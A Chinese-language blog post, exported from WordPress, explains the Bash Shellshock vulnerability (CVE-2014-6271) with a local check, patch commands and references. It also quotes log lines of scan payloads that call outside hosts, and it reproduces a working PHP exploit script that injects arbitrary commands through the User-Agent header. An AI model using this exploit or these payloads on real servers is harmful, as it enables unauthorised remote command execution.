\u6700\u8fd1\u51e0\u5e74\u7206\u53d1\u7684\u5b89\u5168\u6f0f\u6d1e\u771f\u7684\u662f\u8d8a\u6765\u8d8a\u201c\u57fa\u7840\/\u5e95\u5c42\u201d\u4e86\uff0c\u4ece\u53bb\u5e747\u6708\u4efd\u7684Apache Struts2\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\uff0c\u5230\u4eca\u5e744\u6708\u4efd\u7684OpenSSL HeartBleed\u6f0f\u6d1e\uff0c\u518d\u52a0\u4e0a\u8fd9\u6b21\u7684Bash\u73af\u5883\u53d8\u91cf\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e\u2026\u2026\u4e0d\u77e5\u9053\u4e0b\u6b21\u7684\u7206\u53d1\u4f1a\u662f\u5728\u4ec0\u4e48\u65f6\u5019\uff1f<\/p>\n
\u53c2\u52a0\u5b8c\u57f9\u8bad\u56de\u6765\u4e4b\u540e\u53d1\u73b0\u7fa4\u91cc\u9762\u6709\u5c0f\u4f19\u4f34\u8ba8\u8bba\u8fd9\u4e2a\uff0c\u4e0d\u8fc7\u5bf9\u516c\u53f8\u6ca1\u4ec0\u4e48\u5f71\u54cd\uff0c\u56e0\u4e3a\u6ca1\u6709\u4f7f\u7528Bash\u4f5c\u4e3a\u89e3\u91ca\u5668\u7684\u7f51\u5173\u63a5\u53e3\u3002<\/p>\n
\u65e2\u7136\u516c\u53f8\u4e0d\u53d7\u5f71\u54cd\uff0c\u90a3\u6211\u5c31\u5148\u770b\u770b\u81ea\u5df1\u7684\u7cfb\u7edf\u662f\u5426\u53d7\u5f71\u54cd\u5427\uff1a<\/p>\n
# env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\nvulnerable\nthis is a test\n\n# echo $SHELL\n\/bin\/bash\n\n# bash --version\nGNU bash, version 4.3.11(1)-release (i686-pc-linux-gnu)\nCopyright (C) 2013 Free Software Foundation, Inc.\nLicense GPLv3+: GNU GPL version 3 or later <http:\/\/gnu.org\/licenses\/gpl.html>\n\nThis is free software; you are free to change and redistribute it.\nThere is NO WARRANTY, to the extent permitted by law.\n#\n# env x='() { :;}; echo vulnerable' bash -c \"echo this is a test\"\nbash: warning: x: ignoring function definition attempt\nbash: error importing function definition for `x'\nthis is a test\n\n# https:\/\/access.redhat.com\/articles\/1200223<\/pre>\n\u5e0c\u671b\u4fee\u590d\u7684\u8fd8\u7b97\u53ca\u65f6o(\u256f\u25a1\u2570)o<\/p>\n
\n\u53d7\u5f71\u54cd\u7684\u7cfb\u7edf\u5305\u62ec\uff1a<\/h6>\n
Redhat
\nCentOS
\nDebian
\nUbuntu<\/p>\n
RedHat\u7cfb\u5217 \u53ef\u901a\u8fc7\u66f4\u65b0 bash \u5e76\u91cd\u542f\u7cfb\u7edf<\/span>\u6765\u89e3\u51b3\u8fd9\u4e2a\u95ee\u9898\uff1a<\/h6>\n# yum update bash
\n\u6216\u8005\uff1a
\n# yum update bash-4.1.2-15.el6_5.1
\n\u6b64\u4e3e\u53ea\u662f\u66f4\u65b0\u4e86 bash \u5305\uff0c\u8fd8\u9700\u8981\u91cd\u542f\u7cfb\u7edf\u624d\u80fd\u751f\u6548\u3002<\/p>\n
Ubuntu \u7528\u6237\u53ef\u4ee5\u901a\u8fc7\u5982\u4e0b\u547d\u4ee4\u6253\u8865\u4e01\uff0c\u65e0\u9700\u91cd\u542f\uff1a<\/h6>\n
apt-get update
\napt-get install bash<\/p>\n
\n\u76f8\u5173\u63cf\u8ff0\uff1a<\/h6>\n
GNU Bash 4.3\u53ca\u4e4b\u524d\u7248\u672c\u5728\u5904\u7406\u67d0\u4e9b\u6784\u9020\u7684\u73af\u5883\u53d8\u91cf\u65f6\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\uff0c\u5411\u73af\u5883\u53d8\u91cf\u503c\u5185\u7684\u51fd\u6570\u5b9a\u4e49\u540e\u6dfb\u52a0\u591a\u4f59\u7684\u5b57\u7b26\u4e32\u4f1a\u89e6\u53d1\u6b64\u6f0f\u6d1e<\/span><\/strong>\uff0c\u653b\u51fb\u8005\u53ef\u5229\u7528\u6b64\u6f0f\u6d1e\u6539\u53d8\u6216\u7ed5\u8fc7\u73af\u5883\u9650\u5236\uff0c\u4ee5\u6267\u884cshell\u547d\u4ee4\u3002\u67d0\u4e9b\u670d\u52a1\u548c\u5e94\u7528\u5141\u8bb8\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u8fdc\u7a0b\u653b\u51fb\u8005\u63d0\u4f9b\u73af\u5883\u53d8\u91cf\u4ee5\u5229\u7528\u6b64\u6f0f\u6d1e\u3002\u6b64\u6f0f\u6d1e\u6e90\u4e8e\u5728\u8c03\u7528bash shell\u4e4b\u524d\u53ef\u4ee5\u7528\u6784\u9020\u7684\u503c\u521b\u5efa\u73af\u5883\u53d8\u91cf\u3002\u8fd9\u4e9b\u53d8\u91cf\u53ef\u4ee5\u5305\u542b\u4ee3\u7801\uff0c\u5728shell\u88ab\u8c03\u7528\u540e\u4f1a\u88ab\u7acb\u5373\u6267\u884c\u3002<\/p>\n\u6b64\u6f0f\u6d1e\u53ef\u80fd\u4f1a\u5f71\u54cd\u5230\u4f7f\u7528ForceCommand\u529f\u80fd\u7684OpenSSH sshd\u3001\u4f7f\u7528mod_cgi\u6216mod_cgid\u7684Apache\u670d\u52a1\u5668\u3001DHCP\u5ba2\u6237\u7aef\u3001\u5176\u4ed6\u4f7f\u7528bash\u4f5c\u4e3a\u89e3\u91ca\u5668\u7684\u5e94\u7528\u7b49\u3002<\/p>\n
\u76ee\u524d\u8ba4\u4e3a\u4f7f\u7528mod_php\/mod_python\/mod_perl\u7684Apache httpd\u4e0d\u53d7\u6b64\u95ee\u9898\u5f71\u54cd\u3002<\/p>\n
<\/p>\n
\u53c2\u8003\u94fe\u63a5\uff1a<\/h6>\n\n- https:\/\/access.redhat.com\/articles\/1200223<\/a><\/li>\n
- Bash specially-crafted environment variables code injection attack | Red Hat Security<\/a><\/li>\n
- Bash Code Injection Vulnerability via Specially Crafted Environment Variables (CVE-2014-6271)<\/a><\/li>\n
- GNU Bash \u73af\u5883\u53d8\u91cf\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e(CVE-2014-6271)<\/a><\/li>\n<\/ul>\n
<\/p>\n
\u7a0d\u7a0d\u68c0\u67e5\u4e86\u4e00\u4e0b\u81ea\u5df1\u7684\u65e5\u5fd7\u6587\u4ef6\uff0c\u8fd8\u662f\u6709\u90a3\u4e48\u51e0\u4e2a\u626b\u63cf\u4e8b\u4ef6\u7684\uff0c\u6ca1\u4ec0\u4e48\u611f\u89c9\uff0c\u8981\u626b\u4f60\u5c31\u626b\u5427\uff0c\u9664\u975e\u628ablog\u7ed9\u5f04\u5d29\u4e86\uff0c\u5426\u5219\uff0c\u4e00\u822c\u4e5f\u6ca1\u591a\u7684\u7cbe\u529b\u53bb\u5904\u7406\u8fd9\u65b9\u9762\u7684\u4e8b\u4e86\uff08\u4e5f\u4e0d\u77e5\u9053\u73b0\u5728\u90fd\u5728\u5fd9\u4e9b\u4ec0\u4e48\uff0c\u60f3\u4e9b\u4ec0\u4e48\u53bb\u4e86\uff1f\uff1f\uff1f\uff09\uff0c\u4f46\u662f\uff0c\u8fd9\u6837\u7684\u5178\u578bIP\u8fd8\u662f\u9700\u8981\u5217\u4e00\u5217\u7684\uff1a<\/p>\n
54.251.83.67 - - [27\/Sep\/2014:01:39:08 +0800] \"GET \/ HTTP\/1.1\" 302 5 \"-\" \"() { :;}; \/bin\/bash -c x22echo testing9123123x22; \/bin\/uname -a\" - 0.000\n\n198.20.69.74 - - [26\/Sep\/2014:08:17:05 +0800] \"GET \/ HTTP\/1.1\" 302 5 \"() { :; }; \/bin\/ping -c 1 104.131.0.69\" \"() { :; }; \/bin\/ping -c 1 104.131.0.69\" - 0.001\n\n89.207.135.125 - - [25\/Sep\/2014:16:29:20 +0800] \"GET \/cgi-sys\/defaultwebpage.cgi HTTP\/1.0\" 404 162 \"-\" \"() { :;}; \/bin\/ping -c 1 198.101.206.138\" - 0.187<\/pre>\nPHP\u7248\u7684CVE-2014-6271\u9a8c\u8bc1\u811a\u672c<\/h6>\n<?php\n\/*\nTitle: Bash Specially-crafted Environment Variables Code Injection Vulnerability\nCVE: 2014-6271\nVendor Homepage: https:\/\/www.gnu.org\/software\/bash\/\nAuthor: Prakhar Prasad && Subho Halder\nAuthor Homepage: https:\/\/prakharprasad.com && https:\/\/appknox.com\nDate: September 25th 2014\nTested on: Mac OS X 10.9.4\/10.9.5 with Apache\/2.2.26\n\t GNU bash, version 3.2.51(1)-release (x86_64-apple-darwin13)\nUsage: php bash.php -u http:\/\/<hostname>\/cgi-bin\/<cgi> -c cmd\n\t Eg. php bash.php -u http:\/\/localhost\/cgi-bin\/hello -c \"wget http:\/\/appknox.com -O \/tmp\/shit\"\nReference: https:\/\/www.reddit.com\/r\/netsec\/comments\/2hbxtc\/cve20146271_remote_code_execution_through_bash\/\n\nTest CGI Code : #!\/bin\/bash\n\t\t\t\techo \"Content-type: text\/html\"\n\t\t\t\techo \"\"\n\t\t\t\techo \"Bash-is-Vulnerable\"\n\n*\/\nerror_reporting(0);\nif(!defined('STDIN')) die(\"Please run it through command-line!n\");\n$x = getopt(\"u:c:\");\nif(!isset($x['u']) || !isset($x['c'])) {\n\tdie(\"Usage: \".$_SERVER['PHP_SELF'].\" -u URL -c cmdn\");\n}\n$url = $x['u'];\n$cmd = $x['c'];\n\n$context = stream_context_create(\n\tarray(\n\t\t'http' => array(\n\t\t\t'method' => 'GET',\n\t\t\t'header' => 'User-Agent: () { :;}; \/bin\/bash -c \"'.$cmd.'\"'\n\t\t)\n\t)\n);\n$req = file_get_contents($url, false, $context);\nif(!$req && strpos($http_response_header[0],\"500\") > 0 )\n\tdie(\"Command sent to the server!n\");\nelse if($req && !strpos($http_response_header[0],\"500\") > 0)\n\tdie(\"Server didn't respond as it should!n\");\nelse if(!$req && $http_response_header == NULL)\n\tdie(\"A connection error occurred!n\")\n?><\/pre>\n <\/p>\n","protected":false},"excerpt":{"rendered":"
\u6700\u8fd1\u51e0\u5e74\u7206\u53d1\u7684\u5b89\u5168\u6f0f\u6d1e\u771f\u7684\u662f\u8d8a\u6765\u8d8a\u201c\u57fa\u7840\/\u5e95\u5c42\u201d\u4e86\uff0c\u4ece\u53bb\u5e747\u6708\u4efd\u7684Apache Struts2\u8fdc\u7a0b\u547d\u4ee4\u6267\u884c\u6f0f\u6d1e […]<\/p>\n","protected":false},"author":2,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,25],"tags":[83,351],"class_list":["post-1309","post","type-post","status-publish","format-standard","hentry","category-linux","category-security","tag-bash","tag-vulnerability"],"views":4358,"_links":{"self":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/1309","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/comments?post=1309"}],"version-history":[{"count":0,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/posts\/1309\/revisions"}],"wp:attachment":[{"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/media?parent=1309"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/categories?post=1309"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ixyzero.com\/blog\/wp-json\/wp\/v2\/tags?post=1309"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}